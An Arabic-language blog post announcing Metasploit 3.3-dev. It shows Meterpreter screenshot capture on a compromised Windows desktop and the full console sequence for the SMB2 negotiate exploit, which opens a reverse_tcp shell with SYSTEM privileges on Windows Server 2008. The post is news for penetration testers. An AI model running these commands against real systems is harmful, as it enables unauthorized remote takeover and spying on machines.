بعد اجراء العديد من التطويرات على مشروع ميتا سبلويت منذ الاصدار 3.2 أعلن H.D Moore المطوّر الرئيسي لمشروع الثغرات ميتا سبلويت بتدوينة كتبها بتاريخ البارحة عن بعض الميزات والثغرات الجديدة التي تم تطويرها بالاضافة لتوفير الاصدار 3.3-dev من ميتا سبلويت بشكل حزمة مضغوطة ليتم تحميلها من موقع المشروع.

 

Metasploit Framework

يعتبر ميتا سبلويت هو مشروع الثغرات الأول في عالم الهاكرز حيث يحتوي ميتا سبلويت على العديد من الثغرات الجهازة للاستغلال عن بعد والتي يتم تحديثها بشكل مستمر بالاضافة للعديد من الأدوات المساعدة التي يستخدمها الهاكرز والـ Penetration Testers في عملهم لتساعدهم على اختبار أمن الشبكة وحماية الأجهزة الموجودة فيها من الثغرات.

من الأمور التي تم الانتهاء من تطويرها هي اضافة امكانية أخذ صورة لسطح مكتب الجهاز الذي تم اختراقه عن طريق استغلال Meterpreter وذلك كما وضّح HDM:

meterpreter > ps

Process list
============
PID Name Path
— —- —-
204 iexplore.exe C:Program FilesInternet Exploreriexplore.exe
[ snipped ]
1736 Explorer.EXE C:WINDOWSExplorer.EXE
3348 sol.exe C:WINDOWSsystem32sol.exe

meterpreter > migrate 1736
[*] Migrating to 1736…
[*] Migration completed successfully.

meterpreter > screenshot /tmp/boom.bmp
[*] Image saved to /tmp/boom.bmp
Opening browser to image.

 

Metasploit Meterpreter screenshot

أما الأمر الثاني والذي أجده مهم جداً هو توفير استغلال للثغرة التي اكتشفت مسبقاً وأصابت خدمة مشاركة الملفات في نظام ويندوز فيستا و ويندوز سيرفر 2008 وحتى ويندوز 7.

عندما كتب ذلك الخبر كان الاستغلال عبارة عن Denial of Service فقط مع وجود احتمال لامكانية تطوير الاستغلال ليصبح Remote Code Execution, يبدو أن مطوري مشروع Metasploit والمساهمين فيه تمكّنوا من تحقيق ذلك وأصبحنا قادرين على استغلال الثغرة السابقة لاختراق الأجهزة التي تعمل بنظام ويندوز VISTA SP1 و VISTA SP2 وحتى Windows Server 2008 عن بعد!!

msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit

[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)…
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)

meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

meterpreter > getuid
Server username: NT AUTHORITYSYSTEM

 

يمكننا استخدام الأداة الجديدة التي تم اضافتها للمشروع لفحص الأنظمة التي تستخدم خدمة SMB2 لمشاركة الملفات (الاصدار المستخدم في ويندوز فيستا و ويندوز سيرفر 2008) والتي سنجدها بالمسار التالي:

auxiliary/scanner/smb/smb2

 

طبعا هذه ليست الميزات الوحيدة التي تم تطويرها واضافتها للمشروع منذ الاصدار 3.2 فيوجد الكثير من الثغرات, الأدوات والميزات الأخرى تم اضافتها للمشروع خلال تطويره في الفترة السابقة. المشروع مازال قيد التطوير ويحتاج مزيد من الوقت حتى يتم اطلاق الاصدار 3.3 بشكل نهائي لكن من الممكن متابعة مجريات تطوير المشروع أو استخدام أداة SVN لتحديثه ومزامنته بشكل مستمر.

يمكن من هنا تحميل الحزمة الخاصة بنظام لينوكس وأنظمة Unix-like ومن هنا تحميل الحزمة الخاصة بأنظمة Windows.

 

لمزيد من المعلومات: Metasploit BlogThe Metasploit Project

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedIn